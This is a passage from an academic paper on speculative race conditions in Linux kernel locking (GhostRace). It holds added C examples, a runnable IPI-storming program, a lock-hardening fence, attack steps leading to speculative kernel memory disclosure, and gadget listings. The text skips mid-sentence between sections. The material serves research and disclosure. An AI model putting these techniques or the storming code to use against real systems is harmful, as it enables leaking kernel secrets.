Although the comparison is done atomically, the instruction (as we experimentally verified) does not serialize the execution stream. As a result, we can mistrain the conditional branch at line 4 (e.g., simply by acquiring the mutex multiple times) to be taken and consistently trick speculative execution into acquiring a mutex and entering the guarded critical region. Since this is the case regardless of the current (architectural) state of the mutex, we can speculatively acquire a mutex already held by another thread. In other words, the mutex becomes a no-op on the speculative path, leading to a speculative race condition and opening the door to arbitrary concurrency vulnerabilities at the microarchitectural level.

Generalizing, our analysis shows that all the other common write-side synchronization primitives in the Linux kernel are ultimately implemented through a conditional branch and are therefore vulnerable to speculative race conditions. To experimentally confirm this intuition, we tested all such synchronization primitives under speculative execution after mistraining the vulnerable branch. In all cases, we confirmed transient execution of the guarded critical region despite another victim thread already architecturally executing in the region. To determine the transient window size, we measured the maximum number of speculative load instructions we could speculatively execute inside the critical region.

Figure 7 presents our results for two microarchitectures (Intel Core i9-13900K and AMD Ryzen 9 5950X) and two configurations: (i) attacker and victim thread co-located on the same core; (ii) attacker and victim thread running on different cores. As shown in the figure, the transient window size is significant across settings (20+ loads). Moreover, the window is usually larger when the two threads are running across cores, evidencing that the cache coherency protocol plays a crucial role in propagating the lock's architectural state across cores before speculation aborts. Finally, our results show some variations across microarchitectures. For instance, the AMD processor has a longer speculation window than the Intel one, matching trends from prior work [61]. Overall, our results show an attacker can speculatively bypass all the common (write-side) synchronization primitives and craft speculative race conditions, turning every (architecturally race-free) critical region into a potential generic Spectre gadget.

To conclude, we note that not all the vulnerable synchronization primitives we analyzed are equally exploitable. For instance, uninterruptible primitives (e.g., irq-safe spinlocks) are not amenable to the interrupt-driven techniques detailed in Section 4.1, preventing the attacker from stretching the race window. Moreover, our analysis focuses on the kernel, excluding primitives that normally apply only to user execution (e.g., Intel TSX-based primitives, also uninterruptible without aborting the underlying memory transactions).
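The fast-path shape of Figure 6 reduced to a user-space trylock, next to the hardened form the paper's mitigation amounts to, as an added example that is not the kernel's code: the unhardened variant consumes the cmpxchg outcome with a conditional branch and nothing else, so a mispredicted branch can speculatively run the "acquired" arm while the owner field is non-zero; the hardened variant places a serializing fence immediately after that branch so the critical region cannot be entered transiently. The fence is lfence on x86-64 (the assumed target, as in the paper); on other architectures a full memory fence is substituted here as a stand-in, which is not a speculation barrier.

```c
#include <stdatomic.h>
#include <stdbool.h>

typedef struct { atomic_long owner; } toy_mutex;   /* 0 = unlocked, else owner id */

static inline void speculation_barrier(void)
{
#if defined(__x86_64__) || defined(__i386__)
    __asm__ __volatile__("lfence" ::: "memory");     /* retires only after the branch resolves */
#else
    atomic_thread_fence(memory_order_seq_cst);       /* stand-in on other targets */
#endif
}

/* Unhardened: mirrors the mutex_lock fast path, a lock cmpxchg whose result
 * feeds a conditional branch. Under misprediction the `true` arm, and with it
 * the caller's critical region, runs transiently even when owner != 0. */
bool toy_trylock(toy_mutex *m, long me)
{
    long expected = 0;
    if (atomic_compare_exchange_strong_explicit(&m->owner, &expected, me,
                                                memory_order_acquire,
                                                memory_order_relaxed))
        return true;
    return false;
}

/* Hardened: identical architecturally, but the fence on the acquired path
 * stops younger instructions from executing until the branch is resolved. */
bool toy_trylock_hardened(toy_mutex *m, long me)
{
    long expected = 0;
    if (atomic_compare_exchange_strong_explicit(&m->owner, &expected, me,
                                                memory_order_acquire,
                                                memory_order_relaxed)) {
        speculation_barrier();
        return true;
    }
    return false;
}

void toy_unlock(toy_mutex *m)
{
    atomic_store_explicit(&m->owner, 0, memory_order_release);
}

/* Exercises both locks through the contended case. Returns 1 if the
 * architectural semantics hold (second acquirer fails while held, succeeds
 * after release) for both variants. */
int trylock_selfcheck(void)
{
    toy_mutex m = { 0 };
    if (!toy_trylock(&m, 1)) return 0;              /* thread 1 acquires */
    if (toy_trylock(&m, 2)) return 0;               /* thread 2 must fail while held */
    if (toy_trylock_hardened(&m, 2)) return 0;
    toy_unlock(&m);
    if (!toy_trylock_hardened(&m, 2)) return 0;     /* acquirable again after release */
    toy_unlock(&m);
    return 1;
}
```

The self-check only confirms that the fence changes nothing architecturally, which is the point: the two variants are indistinguishable to a functional test, and the difference exists only in the speculative domain. The check a practitioner can make is on the compiled code, confirming in the disassembly that the lfence sits between the branch on the cmpxchg result and the first instruction of the critical region, and, as the paper's measurements suggest, that the same placement is applied to every write-side primitive and not only the mutex fast path.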
4.3 Exploi ing Specula i e Race Condi ions
To address C3, we need to mount end-to-end information disclosure attacks. To this end, armed with knowledge of speculative race conditions (SRCs), we can now bypass synchronization primitives (e.g., a mutex) on a speculative path and turn safe architectural uses into a speculative concurrent use-after-free (SCUAF). Next, armed with control over memory reuse, we can escalate our SCUAF primitive first to speculative control-flow hijacking and then to speculative information disclosure of some target kernel data. Finally, armed with an unbounded UAF window, we can repeatedly invoke our primitives, disclose arbitrary kernel data, and mount end-to-end attacks leaking some target secret in kernel memory. Figure 8 details the steps of an attack based on our NFC gadget.
Initialization. To kickstart the attack, (1) the attacker starts executing on a given (attacker) core and triggers the allocation of hdev and hdev->cmd_pending_msg. Next, (2) the attacker mistrains the victim mutex's conditional branch by executing the gadget and acquiring the mutex architecturally many times. Next, (3) the attacker starts the victim thread and the storming threads on the corresponding cores.
USENIX Association 33rd USENIX Security Symposium 6191
Figure 8: Speculative information disclosure attack exploiting a speculative race condition. Steps 1-4 and 8-10 run in user mode, issuing syscalls to trigger the relevant kernel code. The other steps run in kernel mode. The nfc_hci_msg_tx_work gadget code is shown only to explain how the speculative race condition is created.
Unbounded UAF Window. To create an unbounded UAF window, (4) the attacker schedules a high-precision timer on the victim core. Next, (5) the attacker causes the victim thread to trigger the execution of the NFC gadget, architecturally locking the mutex and entering the guarded critical region. Next, (6) the NFC gadget calls kfree on the hdev->cmd_pending_msg pointer. Next, (7) the high-precision timer expires, interrupting the victim thread while the hdev->cmd_pending_msg pointer is still dangling. Shortly after, the attacker signals the storming threads to target the victim core with a storm of MEMBARRIER IPIs, preventing the victim thread from resuming execution until the attacker signals the storming threads to terminate.
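The IPI-storming half of step (7), reproduced in user space as an added example (this is not the paper's proof of concept and not kernel code): a victim thread pinned to one core counts how often it gets to run, first undisturbed and then while storming threads on the other cores hammer it with MEMBARRIER_CMD_PRIVATE_EXPEDITED IPIs. The in-kernel high-precision timer that interrupts the victim inside the critical region has no user-space equivalent and is not reproduced. Assumptions: a Linux kernel with private expedited membarrier(2) support (4.14+); the command constants are copied from linux/membarrier.h under local names; run_ipi_storm, storm_cpu_for and the struct storm_result type are our own names.

```c
#define _GNU_SOURCE
#include <pthread.h>
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <time.h>
#include <unistd.h>

/* Command bits from <linux/membarrier.h>, repeated under local names so
 * the example builds without kernel headers (assumed Linux >= 4.14). */
#define MB_CMD_QUERY                       0
#define MB_CMD_PRIVATE_EXPEDITED           (1 << 3)
#define MB_CMD_REGISTER_PRIVATE_EXPEDITED  (1 << 4)
#ifndef SYS_membarrier
# if defined(__x86_64__)
#  define SYS_membarrier 324
# elif defined(__aarch64__)
#  define SYS_membarrier 283
# else
#  error "SYS_membarrier number unknown for this architecture"
# endif
#endif
#define MAX_STORM 64

static long membarrier(int cmd) { return syscall(SYS_membarrier, cmd, 0, 0); }

static atomic_int storm_on, stop_all;        /* phase flags */
static atomic_uint_fast64_t victim_progress; /* victim loop iterations */

/* Pin the calling thread (pid 0) to one CPU through the raw syscall, so no
 * GNU-specific affinity API is required. A failure is tolerated: the
 * measurement then just runs unpinned. */
static int pin_to_cpu(int cpu)
{
    unsigned long mask[16] = { 0 };
    const int w = 8 * (int)sizeof(unsigned long);
    if (cpu < 0 || cpu >= 16 * w) return -1;
    mask[cpu / w] |= 1UL << (cpu % w);
    return (int)syscall(SYS_sched_setaffinity, 0, sizeof(mask), mask);
}

/* CPU for storming thread i: the victim sits on CPU 0, the stormers cycle
 * over the remaining cores (everything lands on CPU 0 if there is one). */
int storm_cpu_for(int i, int ncpu)
{
    return ncpu > 1 ? 1 + (i % (ncpu - 1)) : 0;
}

static void *victim_fn(void *arg)
{
    pin_to_cpu(*(int *)arg);
    /* Stand-in for the interrupted victim: it only counts how often it runs. */
    while (!atomic_load(&stop_all))
        atomic_fetch_add(&victim_progress, 1);
    return NULL;
}

static void *storm_fn(void *arg)
{
    pin_to_cpu(*(int *)arg);
    while (!atomic_load(&stop_all))
        if (atomic_load(&storm_on))
            /* Each call IPIs every core currently running a thread of this
             * process, the victim core included. */
            membarrier(MB_CMD_PRIVATE_EXPEDITED);
    return NULL;
}

static uint64_t progress_during_ms(int ms)
{
    struct timespec ts = { ms / 1000, (ms % 1000) * 1000000L };
    atomic_store(&victim_progress, 0);
    nanosleep(&ts, NULL);
    return (uint64_t)atomic_load(&victim_progress);
}

struct storm_result {
    int status;       /* 0 ok, -1 membarrier unsupported, -2 thread failure */
    uint64_t quiet;   /* victim iterations in the phase without the storm */
    uint64_t stormed; /* victim iterations in the phase under the IPI storm */
};

/* Run one quiet and one stormed phase of `ms` milliseconds each. */
struct storm_result run_ipi_storm(int nstorm, int ms)
{
    struct storm_result r = { 0, 0, 0 };
    static int cpus[1 + MAX_STORM];
    pthread_t tids[1 + MAX_STORM];
    int ncpu = (int)sysconf(_SC_NPROCESSORS_ONLN), created = 0;
    long q = membarrier(MB_CMD_QUERY);

    if (ncpu < 1) ncpu = 1;
    if (nstorm < 1) nstorm = 1;
    if (nstorm > MAX_STORM) nstorm = MAX_STORM;
    /* Private expedited barriers must be registered once per process. */
    if (q < 0 || !(q & MB_CMD_PRIVATE_EXPEDITED) ||
        membarrier(MB_CMD_REGISTER_PRIVATE_EXPEDITED) < 0) {
        r.status = -1;
        return r;
    }
    atomic_store(&stop_all, 0);
    atomic_store(&storm_on, 0);
    cpus[0] = 0;
    if (pthread_create(&tids[0], NULL, victim_fn, &cpus[0]) == 0) {
        created = 1;
        for (int i = 0; i < nstorm; i++) {
            cpus[1 + i] = storm_cpu_for(i, ncpu);
            if (pthread_create(&tids[1 + i], NULL, storm_fn, &cpus[1 + i]))
                break;
            created++;
        }
    }
    if (created == 1 + nstorm) {
        r.quiet = progress_during_ms(ms);
        atomic_store(&storm_on, 1);
        r.stormed = progress_during_ms(ms);
        atomic_store(&storm_on, 0);
    } else {
        r.status = -2;
    }
    atomic_store(&stop_all, 1);
    for (int i = 0; i < created; i++)
        pthread_join(tids[i], NULL);
    return r;
}

int main(void)
{
    struct storm_result r = run_ipi_storm(3, 200);
    if (r.status != 0) {
        printf("membarrier storm not runnable here (status %d)\n", r.status);
        return 1;
    }
    printf("victim iterations: quiet=%llu stormed=%llu (%.1f%% of quiet)\n",
           (unsigned long long)r.quiet, (unsigned long long)r.stormed,
           r.quiet ? 100.0 * r.stormed / r.quiet : 0.0);
    return 0;
}
```

The ratio printed is the victim's progress under the storm relative to its undisturbed progress; the closer it gets to zero, the longer an interrupted critical region would stay open. On kernels carrying the rate-limiting commit cited later on this page ([4]), sys_membarrier is serialized by a mutex, so the stormers mostly queue on that mutex and the ratio is expected to be much closer to 1; the text notes that this is still not a complete fix.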
Speculative Control-Flow Hijacking. (8) For each kernel address to leak in order to disclose the target secret, the attacker first crafts a speculative control-flow hijacking (SCFH) primitive. To this end, the attacker needs to allocate a controlled object reusing the memory slot kfree'd earlier via slab massaging. With SLUB (the default slab implementation), the attacker can exploit same-CPU, same-size-class slab cache collision techniques [48] to achieve memory reuse. Specifically, (9) the attacker first creates a malicious struct msgbuf message, casts it to struct hci_msg, and sets: (i) the hci_msg.cb callback to the speculative SCFH target, (ii) the hci_msg.cb_context first callback argument to the SCFH argument. Next, (10) the attacker calls the msgsnd system call with the malicious msgbuf message, which ultimately gets allocated in the same slot as the freed hdev->cmd_pending_msg. Next, (11) the attacker triggers the execution of the gadget. Due to the mistrained branch, the CPU speculatively enters the critical region despite the mutex being architecturally held by the victim thread. Next, (12) the gadget speculatively dereferences the dangling pointer, hijacking control flow to the attacker-controlled callback target.
Speculative Information Disclosure. To craft a speculative information disclosure primitive, the attacker first needs to break KASLR using existing techniques [2]. Next, the attacker needs to trigger the SCFH primitive with the callback target set to a kernel disclosure gadget that takes the controlled first callback argument (rdi) as input. For this purpose, we use the p_del_ qs Spectre gadget in Figure 9, also exploited in older kernel versions in prior work [27]. As shown in the figure, the controlled memory referenced by rdi is dereferenced by the gadget to compute the secret address (r12+0x28) and the base address of an array (rax), which we can use as the reload buffer for a classic FLUSH+RELOAD Spectre covert channel [45]. The gadget reads the secret into the rdx register, which is then used to index the reload buffer with stride 8 at line 22. To handle the small stride and the high secret entropy, we can use sliding techniques, as done in prior work [27,73]. Ultimately,
like Spectre-v1. The Linux kernel developers have no immediate plans to implement serialization of synchronization primitives due to performance concerns. However, they confirmed the IPI storming issue (CVE-2024-26602 [3]) and implemented an IPI rate limiting feature to address the CPU saturation issue by adding a synchronization mutex on the path of sys_membarrier and avoiding its concurrent execution on multiple cores [4]. Unfortunately, as our experiments show (Figure 5), hindering IPI storming primitives (i.e., 0 storming cores) is insufficient to completely close the attack surface.
Acknowledgments

We would like to thank the anonymous reviewers for their feedback, Andrew Cooper for his early comments on the paper, Julia Lawall for the Coccinelle clarifications, and Alessandro Sorniotti for the early discussions about the project. This work was partially supported by Intel Corporation through the "Allocamelus" project, by the Dutch Research Council (NWO) through project "INTERSECT", and by the European Union's Horizon Europe program under grant agreement No. 101120962 ("Rescale").
References

[1] GhostRace - CVE-2024-2193. https://www.cve.org/CVERecord?id=CVE-2024-2193.
[2] Kernel address space layout derandomization (kasld). https://github.com/bcoles/kasld.
[3] Membarrier IPI Storming - CVE-2024-26602. https://lore.kernel.org/lkml/2024022614-unhappily-python-2cd0@gregkh/.
[4] sched/membarrier: reduce the ability to hammer on sys_membarrier. https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=944d5fe50f3f03daacfea16300e656a1691c4a23.
[5] CWE-416: Use after free, 2006.
[6] Analysis and exploitation of Pegasus kernel vulnerabilities (CVE-2016-4655 / CVE-2016-4656), 2016.
[7] Mac OS X privilege escalation via use-after-free: CVE-2016-1828, 2016.
[8] Intel research on disclosure gadgets at indirect branch targets in the Linux* kernel, 2022.
[9] Jia-Ju Bai, Julia Lawall, Qiu-Liang Chen, and Shi-Min Hu. Effective static analysis of concurrency use-after-free bugs in Linux device drivers. In USENIX ATC, 2019.
[10] Enrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano Giuffrida. Branch history injection: On the effectiveness of hardware mitigations against cross-privilege Spectre-v2 attacks. In USENIX Security, 2022.
[11] Adam Belay, Andrea Bittau, Ali Mashtizadeh, David Terei, David Mazières, and Christos Kozyrakis. Dune: Safe user-level access to privileged CPU features. In OSDI, 2012.
[12] Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, Alessandro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus. SMoTherSpectre: exploiting speculative execution through port contention. In CCS, 2019.
[13] Marcel Böhme, Van-Thuan Pham, Manh-Dung Nguyen, and Abhik Roychoudhury. Directed greybox fuzzing. In CCS, 2017.
[14] Juan Caballero, Gustavo Grieco, Mark Marron, and Antonio Nappa. Undangle: Early detection of dangling pointers in use-after-free and double-free vulnerabilities. In ISSTA, 2012.
[15] Yan Cai, Biyun Zhu, Ruijie Meng, Hao Yun, Liang He, Purui Su, and Bin Liang. Detecting concurrency memory corruption vulnerabilities. In ESEC/FSE, 2019.
[16] Dan Carpenter. Smatch check for Spectre stuff, 2018.
[17] Hongxu Chen, Shengjian Guo, Yinxing Xue, Yulei Sui, Cen Zhang, Yuekang Li, Haijun Wang, and Yang Liu. MUZZ: Thread-aware grey-box fuzzing for effective bug hunting in multithreaded programs. In USENIX Security, 2020.
[18] Hongxu Chen, Yinxing Xue, Yuekang Li, Bihuan Chen, Xiaofei Xie, Xiuheng Wu, and Yang Liu. Hawkeye: Towards a desired directed grey-box fuzzer. In CCS, 2018.
[19] Nick Clifton. Spectre variant 1 scanning tool, 2018.
[20] Scott Constable, Jo Van Bulck, Xiang Cheng, Yuan Xiao, Cedric Xing, Ilya Alexandrovich, Taesoo Kim, Frank Piessens, Mona Vij, and Mark Silberstein. AEX-Notify: Thwarting precise single-stepping attacks through interrupt awareness for Intel SGX enclaves. In USENIX Security, 2023.
[21] Craig Disselkoen, David Kohlbrenner, Leo Porter, and Dean Tullsen. Prime+Abort: A timer-free high-precision L3 cache attack using Intel TSX. In USENIX Security, 2017.
[22] Zhengjie Du, Yuekang Li, Yang Liu, and Bing Mao. Windranger: A directed greybox fuzzer driven by deviation basic blocks. In ICSE, 2022.
[23] Alireza Farshin, Amir Roozbeh, Gerald Q Maguire Jr, and Dejan Kostić. Make the most out of last level cache in Intel processors. In EuroSys, 2019.
[24] Josué Feliu, Alberto Ros, Manuel E Acacio, and Stefanos Kaxiras. ITSLF: Inter-thread store-to-load forwarding in simultaneous multithreading. In MICRO, 2021.
[25] Josué Feliu, Alberto Ros, Manuel E Acacio, and Stefanos Kaxiras. Speculative inter-thread store-to-load forwarding in SMT architectures. Journal of Parallel and Distributed Computing, 173:94–106, 2023.
[26] Thomas Gleixner and Douglas Niehaus. Hrtimers and beyond: Transforming the Linux time subsystems. In Proceedings of the Linux Symposium, volume 1, pages 333–346. Citeseer, 2006.
[27] Enes Göktaş, Kaveh Razavi, Georgios Portokalidis, Herbert Bos, and Cristiano Giuffrida. Speculative Probing: Hacking Blind in the Spectre Era. In CCS, 2020.
[28] Sishuai Gong, Deniz Altinbüken, Pedro Fonseca, and Petros Maniatis. Snowboard: Finding kernel concurrency bugs through systematic inter-thread communication analysis. In SOSP, 2021.
[29] Daniel Gruss, Clémentine Maurice, Klaus Wagner, and Stefan Mangard. Flush+Flush: A fast and stealthy cache attack. In DIMVA, 2016.
[30] Marco Guarnieri, Boris Köpf, José F Morales, Jan Reineke, and Andrés Sánchez. Spectector: Principled detection of speculative information flows. In S&P, 2020.
[31] Mathé Hertogh, Sander Wiebing, and Cristiano Giuffrida. Leaky address masking: Exploiting unmasked Spectre gadgets with noncanonical address translation. In S&P, 2024.
[32] Mathé Hertogh, Manuel Wiesinger, Sebastian Österlund, Marius Muench, Nadav Amit, Herbert Bos, and Cristiano Giuffrida. Quarantine: Mitigating transient execution attacks with physical domain isolation. In RAID, 2023.
[33] Jann Horn. speculative execution, variant 4: speculative store bypass, 2018.
[34] Jann Horn. Exploiting race conditions on [ancient] Linux. In LSSEU, 2019.
[35] Heqing Huang, Yiyuan Guo, Qingkai Shi, Peisen Yao, Rongxin Wu, and Charles Zhang. BEACON: Directed grey-box fuzzing with provable path pruning. In S&P, 2022.
[36] Jeff Huang. UFO: Predictive concurrency use-after-free detection. In ICSE, 2018.
[37] Open Source Security Inc. Respectre: The state of the art in Spectre defenses, 2018.
[38] Dae Jeong, Kyungtae Kim, Basavesh Shivakumar, Byoungyoung Lee, and Insik Shin. Razzer: Finding kernel race bugs through fuzzing. In S&P, 2019.
[39] Dae R Jeong, Byoungyoung Lee, Insik Shin, and Youngjin Kwon. SegFuzz: Segmentizing thread interleaving to discover kernel concurrency bugs through fuzzing. In S&P, 2023.
[40] Zu-Ming Jiang, Jia-Ju Bai, Kangjie Lu, and Shi-Min Hu. Context-sensitive and directional concurrency fuzzing for data-race detection. In NDSS, 2022.
[41] Brian Johannesmeyer, Jakob Koschel, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. Kasper: Scanning for Generalized Transient Execution Gadgets in the Linux Kernel. In NDSS, April 2022.
[42] Vladimir Kiriansky and Carl Waldspurger. Speculative buffer overflows: Attacks and defenses. arXiv:1807.03757.
[43] Ofek Kirzner and Adam Morrison. An analysis of speculative type confusion vulnerabilities in the wild. arXiv preprint arXiv:2106.15601, 2021.
[44] Youngjoo Ko, Bin Zhu, and Jong Kim. Fuzzing with automatically controlled interleavings to detect concurrency bugs. Journal of Systems and Software, 191:111379, 2022.
[45] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, and Yuval Yarom. Spectre Attacks: Exploiting Speculative Execution. In S&P, 2019.
[46] Byoungyoung Lee, Chengyu Song, Yeongjin Jang, Tielei Wang, Taesoo Kim, Long Lu, and Wenke Lee. Preventing use-after-free with dangling pointers nullification. In NDSS, 2015.
[47] Gwangmu Lee, Woochul Shim, and Byoungyoung Lee. Constraint-guided directed greybox fuzzing. In USENIX Security, 2021.
[48] Yoochan Lee, Jinhan Kwak, Junesoo Kang, Yuseok Jeon, and Byoungyoung Lee. Pspray: Timing side-channel based Linux kernel heap exploitation technique. In USENIX Security, 2023.
[49] Yoochan Lee, Changwoo Min, and Byoungyoung Lee. ExpRace: Exploiting kernel races through raising interrupts. In USENIX Security, 2021.
[50] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval Yarom, and Mike Hamburg. Meltdown: Reading Kernel Memory from User Space. In USENIX Security, 2018.
[51] Changming Liu, Deqing Zou, Peng Luo, Bin B. Zhu, and Hai Jin. A heuristic framework to detect concurrency vulnerabilities. In ACSAC, 2018.
[52] Andrea Mambretti, Alexandra Sandulescu, Matthias Neugschwandtner, Alessandro Sorniotti, and Anil Kurmus. Two methods for exploiting speculative control flow hijacks. In USENIX WOOT 19.
[53] Andrea Mambretti, Alexandra Sandulescu, Alessandro Sorniotti, William Robertson, Engin Kirda, and Anil Kurmus. Bypassing memory safety mechanisms through speculative control flow hijacks. In IEEE EuroS&P, 2021.
[54] Larry W McVoy, Carl Staelin, et al. lmbench: Portable tools for performance analysis. In USENIX ATC, 1996.
[55] Manh-Dung Nguyen, Sébastien Bardin, Richard Bonichon, Roland Groz, and Matthieu Lemerre. Binary-level directed fuzzing for use-after-free vulnerabilities, 2020.
[56] Oleksii Oleksenko, Bohdan Trach, Mark Silberstein, and Christof Fetzer. SpecFuzz: Bringing Spectre-type vulnerabilities to the surface. In USENIX Security, 2020.
[57] Riccardo Paccagnella, Licheng Luo, and Christopher W Fletcher. Lord of the ring(s): Side channel attacks on the CPU on-chip ring interconnect are practical. arXiv preprint arXiv:2103.03443, 2021.
[58] Yoann Padioleau, René Rydhof Hansen, Julia L. Lawall, and Gilles Muller. Semantic patches for documenting and automating collateral evolutions in Linux device drivers. In PLOS, 2006.
[59] Yoann Padioleau, Julia L. Lawall, and Gilles Muller. Semantic patches, documenting and automating collateral evolutions in Linux device drivers. In OLS, 2007.
[60] Zhenxiao Qi, Qian Feng, Yueqiang Cheng, Mengjia Yan, Peng Li, Heng Yin, and Tao Wei. SpecTaint: Speculative taint analysis for discovering Spectre gadgets. 2021.
[61] Hany Ragab, Enrico Barberis, Herbert Bos, and Cristiano Giuffrida. Rage Against the Machine Clear: A Systematic Analysis of Machine Clears and Their Implications for Transient Execution Attacks. In USENIX Security, 2021.
[62] Koushik Sen. Race directed random testing of concurrent programs. In PLDI, 2008.
[63] Youssef Tobah, Andrew Kwong, Ingab Kang, Daniel Genkin, and Kang G Shin. SpecHammer: Combining Spectre and Rowhammer for new speculative attacks. In S&P, 2022.
[64] Daniël Trujillo, Johannes Wikner, and Kaveh Razavi. Inception: exposing new attack surfaces with training in transient execution. In USENIX Security, 2023.
[65] Jo Van Bulck, Frank Piessens, and Raoul Strackx. SGX-Step: A practical attack framework for precise enclave execution control. In SysTEX, 2017.
[66] Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Giorgi Maisuradze, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. RIDL: Rogue in-flight data load. In S&P, 2019.
[67] Nischai Vinesh and M. Sethumadhavan. ConFuzz, a concurrency fuzzer. In Ashish Kumar Luhach, Janos Arpad Kosa, Ramesh Chandra Poonia, Xiao-Zhi Gao, and Dharm Singh, editors, ICTSCI, 2020.
[68] Guanhua Wang, Sudipta Chattopadhyay, Arnab Kumar Biswas, Tulika Mitra, and Abhik Roychoudhury. KleeSpectre: Detecting information leakage through speculative cache attacks via symbolic execution. TOSEM, 29(3), 2020.
[69] Guanhua Wang, Sudipta Chattopadhyay, Ivan Gotovchits, Tulika Mitra, and Abhik Roychoudhury. oo7: Low-overhead defense against Spectre attacks via program analysis. IEEE TSE, PP:1–1, 11 2019.
[70] Haijun Wang, Xiaofei Xie, Yi Li, Cheng Wen, Yuekang Li, Yang Liu, Shengchao Qin, Hongxu Chen, and Yulei Sui. Typestate-guided fuzzer for discovering use-after-free vulnerabilities. In ICSE, 2020.
[71] Nico Weichbrodt, Anil Kurmus, Peter Pietzuch, and Rüdiger Kapitza. AsyncShock: Exploiting synchronisation bugs in Intel SGX enclaves. In ESORICS, 2016.
[72] Sander Wiebing, Alvise de Faveri Tron, Herbert Bos, and Cristiano Giuffrida. InSpectre Gadget: Inspecting the residual attack surface of cross-privilege Spectre v2. In USENIX Security, 2024.
[73] Johannes Wikner and Kaveh Razavi. RETBLEED: Arbitrary speculative code execution with return instructions. In USENIX Security, 2022.
[74] Meng Xu, Sanidhya Kashyap, Hanqing Zhao, and Taesoo Kim. Krace: Data race fuzzing for kernel file systems. In S&P, 2020.
[75] Hua Yan, Yulei Sui, Shiping Chen, and Jingling Xue. Spatio-temporal context reduction: A pointer-analysis-based static approach to detecting use-after-free vulnerabilities. In ICSE, 2018.
[76] Yuval Yarom and Naomi Benger. Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack. IACR Cryptology ePrint Archive, 2014.
[77] Yuval Yarom and Katrina Falkner. FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-channel Attack. In USENIX Security, 2014.
[78] Jiayi Ye, Chao Zhang, and Xinhui Han. Poster: UAFChecker: Scalable static detection of use-after-free vulnerabilities. In CCS, 2014.
[79] Wei You, Peiyuan Zong, Kai Chen, XiaoFeng Wang, Xiaojing Liao, Pan Bian, and Bin Liang. SemFuzz: Semantics-based automatic generation of proof-of-concept exploits. In CCS, 2017.
[80] Ming Yuan, Bodong Zhao, Penghui Li, Jiashuo Liang, Xinhui Han, Xiapu Luo, and Chao Zhang. DDRace: Finding concurrency UAF vulnerabilities in Linux drivers with directed fuzzing.
[81] Google Project Zero. Racing against the clock – hitting a tiny kernel race window, 2023.
[82] Peiyuan Zong, Tao Lv, Dawei Wang, Zizhuang Deng, Ruigang Liang, and Kai Chen. FuzzGuard: Filtering out unreachable inputs in directed grey-box fuzzing through deep learning. In USENIX Security, 2020.
A Additional SRC Code Patterns

We discuss SRC code patterns other than SCUAFs that are potentially exploitable. In principle, any data race pattern that may lead to a memory error could be vulnerable, but it must also exhibit a Spectre-like transmitter pattern, as shown in the examples below.

A data race may lead, for example, to an out-of-bounds access. We show in Listing 1 a code pattern where Thread 1, which is the architecturally executing thread, performs an update on a shared index variable. We can also assume that the offset value can be attacker-controlled. Such a pattern could occur, for example, when using a circular buffer. The transiently executed thread performs a speculative write, which can be out-of-bounds. Assuming that array elements are the same size as pointers, this scenario would give the attacker control over the function pointer. Note that a speculative control-flow hijack is not necessary: any known Spectre transmitter pattern could also suffice, as shown in Listing 2. This case immediately leads to an arbitrary read primitive, without the need for additional gadgets.
Listing 1: OOB access SRC

    // Thread 1 (architectural, interrupted):
    mutex_lock(&m);
    shared_idx += offset;        // interrupted here, before the bounds check
    if (shared_idx > ARRAY_SIZE)
        shared_idx = 0;
    mutex_unlock(&m);

    // Thread 2 (transient):
    mutex_lock(&m);              // speculatively bypassed
    array[shared_idx] = val;     // speculative OOB write
    fptr();                      // control-flow hijack
    mutex_unlock(&m);
Listing 2: Other transmitter

    // Thread 2 (transient):
    mutex_lock(&m);              // speculatively bypassed
    byte = array[shared_idx];    // access secret
    val = probe_array[4096 * byte]; // transmit via the cache
    mutex_unlock(&m);
Other patterns are highly likely to exist. We expect future work to further study their prevalence and exploitability.